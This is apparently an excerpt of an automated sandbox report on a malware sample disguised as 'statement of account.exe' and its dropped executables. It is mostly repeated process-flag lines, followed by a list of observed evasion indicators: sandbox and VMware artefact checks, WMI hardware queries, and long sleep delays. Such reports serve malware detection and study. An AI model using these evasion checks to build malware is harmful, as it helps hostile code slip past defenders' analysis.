                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000004.00000002.408840433.0000000002784000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000004.00000002.408840433.0000000002784000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\statement of account.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\statement of account.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\statement of account.exe TID: 5972Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\statement of account.exe TID: 2436Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\Desktop\statement of account.exe TID: 4472Thread sleep count: 9754 > 30
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe TID: 5484Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe TID: 4124Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe TID: 4976Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe TID: 5176Thread sleep count: 9455 > 30
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe TID: 5916Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe TID: 5932Thread sleep count: 9382 > 30
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\statement of account.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\statement of account.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\statement of account.exeWindow / User API: threadDelayed 9754
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWindow / User API: threadDelayed 9455
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWindow / User API: threadDelayed 9382
                Source: C:\Users\user\Desktop\statement of account.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\statement of account.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\statement of account.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exeThread delayed: delay time: 922337203685477
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
